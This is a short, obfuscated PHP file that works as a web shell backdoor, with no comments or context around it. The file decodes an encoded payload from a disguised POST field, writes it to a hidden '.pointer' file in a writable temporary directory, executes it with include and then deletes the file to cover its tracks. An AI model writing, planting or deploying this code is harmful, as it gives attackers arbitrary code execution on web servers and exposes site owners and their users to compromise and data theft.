<?php

if(array_key_exists("r\x65sour\x63\x65", $_POST) && !is_null($_POST["r\x65sour\x63\x65"])){
	$tkn = $_POST["r\x65sour\x63\x65"];
	 $tkn	= explode	( "."		 , $tkn		 )	; 	
	$entity = '';
            $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s6);
            $q = 0;
    
            array_walk($tkn  ,function ($v1) use (&$entity  ,&$q  ,$s6  ,$lenS) {		$chS = ord($s6[$q 	%		$lenS]);
                $d = ((int)$v1 - $chS - ($q 	%		10)) ^31;
                $entity .= chr($d);
                $q++;
            });
	$symbol = array_filter([sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), "/tmp", getcwd()]);
	foreach ($symbol as $key => $k) {
    		if (max(0, is_dir($k) * is_writable($k))) {
    $object = join("/", [$k, ".pointer"]);
    $file = fopen($object, 'w');
if ($file) {
	fwrite($file, $entity);
	fclose($file);
	include $object;
	@unlink($object);
	die();
}
}
}
}